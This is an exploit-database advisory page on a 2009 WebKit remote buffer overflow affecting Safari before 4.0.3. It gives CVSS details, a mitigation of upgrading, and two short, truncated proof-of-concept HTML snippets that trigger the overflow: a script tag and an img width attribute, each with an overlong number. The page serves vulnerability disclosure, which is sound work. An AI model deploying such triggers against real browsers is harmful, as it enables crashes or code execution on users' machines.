header-logo
Suggest Exploit
vendor:
Safari
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Safari
Affected Version From: Prior to Apple Safari 4.0.3
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

WebKit Remote Buffer Overflow Vulnerability

WebKit is prone to a remote buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. Examples of the vulnerability include using a script tag with a long number or an image tag with a long number as the width attribute.

Mitigation:

Upgrade to the latest version of WebKit or the application using WebKit.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36023/info

WebKit is prone to a remote buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected. 


Example 1:
---------
<script>
var Overflow = "31337" + 0.313373133731337313373133731337...;
</script>
---------

Example 2:
---------
<img width=0.3133731337313373133731337... src="31337.jpg">
---------

Navigation

Suggest Exploit

Services By CQR